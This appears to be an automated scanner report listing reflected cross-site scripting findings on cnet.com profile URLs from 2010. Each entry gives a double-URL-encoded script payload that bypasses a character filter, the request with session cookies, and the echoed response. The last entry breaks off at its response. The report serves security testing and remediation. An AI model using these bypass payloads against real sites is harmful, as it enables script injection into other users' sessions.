The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aef08%253cscript%253ealert%25281%2529%253c%252fscript%253eb583652dea1 was submitted in the REST URL parameter 2. This input was echoed as aef08<script>alert(1)</script>b583652dea1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/JJKaminskiaef08%253cscript%253ealert%25281%2529%253c%252fscript%253eb583652dea1/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:21 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:22 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=992 Connection: Keep-Alive Content-Length: 31092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>JJKaminskiaef08<script>alert(1)</script>b583652dea1's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36cea%253cscript%253ealert%25281%2529%253c%252fscript%253ea58c9795e35 was submitted in the REST URL parameter 2. This input was echoed as 36cea<script>alert(1)</script>a58c9795e35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Jasmineflower36cea%253cscript%253ealert%25281%2529%253c%252fscript%253ea58c9795e35/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:04 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:04 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=943 Connection: Keep-Alive Content-Length: 31077
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Jasmineflower36cea<script>alert(1)</script>a58c9795e35's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7611e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec382c801d21 was submitted in the REST URL parameter 2. This input was echoed as 7611e"><script>alert(1)</script>c382c801d21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Jasmineflower7611e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec382c801d21/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:03 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:03 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=971 Connection: Keep-Alive Content-Length: 31171
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Jasmineflower7611e"><script>alert(1)</script>c382c801d21"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3c52e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8536837bcb was submitted in the REST URL parameter 2. This input was echoed as 3c52e<script>alert(1)</script>c8536837bcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Jon+Skillings3c52e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8536837bcb/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:38 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:39 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=978 Connection: Keep-Alive Content-Length: 31092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Jon Skillings3c52e<script>alert(1)</script>c8536837bcb's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42f26%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ef8d499f2f was submitted in the REST URL parameter 2. This input was echoed as 42f26"><script>alert(1)</script>4ef8d499f2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Jon+Skillings42f26%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ef8d499f2f/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:37 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:37 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=989 Connection: Keep-Alive Content-Length: 31121
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Jon Skillings42f26"><script>alert(1)</script>4ef8d499f2f"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6f8b%253cscript%253ealert%25281%2529%253c%252fscript%253e64ed32fd11 was submitted in the REST URL parameter 2. This input was echoed as f6f8b<script>alert(1)</script>64ed32fd11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Josh.Lowensohnf6f8b%253cscript%253ealert%25281%2529%253c%252fscript%253e64ed32fd11/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:09 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:09 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=974 Connection: Keep-Alive Content-Length: 31147
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Josh.Lowensohnf6f8b<script>alert(1)</script>64ed32fd11's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31096%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c20b3de775 was submitted in the REST URL parameter 2. This input was echoed as 31096"><script>alert(1)</script>7c20b3de775 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Josh.Lowensohn31096%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c20b3de775/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:04 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:04 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=978 Connection: Keep-Alive Content-Length: 31201
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Josh.Lowensohn31096"><script>alert(1)</script>7c20b3de775"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8cced%253cscript%253ealert%25281%2529%253c%252fscript%253e6173a60c962 was submitted in the REST URL parameter 2. This input was echoed as 8cced<script>alert(1)</script>6173a60c962 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/KentGerman8cced%253cscript%253ealert%25281%2529%253c%252fscript%253e6173a60c962/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:11 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:11 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=987 Connection: Keep-Alive Content-Length: 31036
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>KentGerman8cced<script>alert(1)</script>6173a60c962's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d512%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5a8a9657fb was submitted in the REST URL parameter 2. This input was echoed as 6d512"><script>alert(1)</script>c5a8a9657fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/KentGerman6d512%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5a8a9657fb/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:10 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:10 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=990 Connection: Keep-Alive Content-Length: 31140
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="KentGerman6d512"><script>alert(1)</script>c5a8a9657fb"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66b51%253cscript%253ealert%25281%2529%253c%252fscript%253ec054617f7cd was submitted in the REST URL parameter 2. This input was echoed as 66b51<script>alert(1)</script>c054617f7cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Leslie+Katz66b51%253cscript%253ealert%25281%2529%253c%252fscript%253ec054617f7cd/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:12 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:12 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=968 Connection: Keep-Alive Content-Length: 31046
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Leslie Katz66b51<script>alert(1)</script>c054617f7cd's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb1ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ed168db2c was submitted in the REST URL parameter 2. This input was echoed as bb1ab"><script>alert(1)</script>5ed168db2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Leslie+Katzbb1ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ed168db2c/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
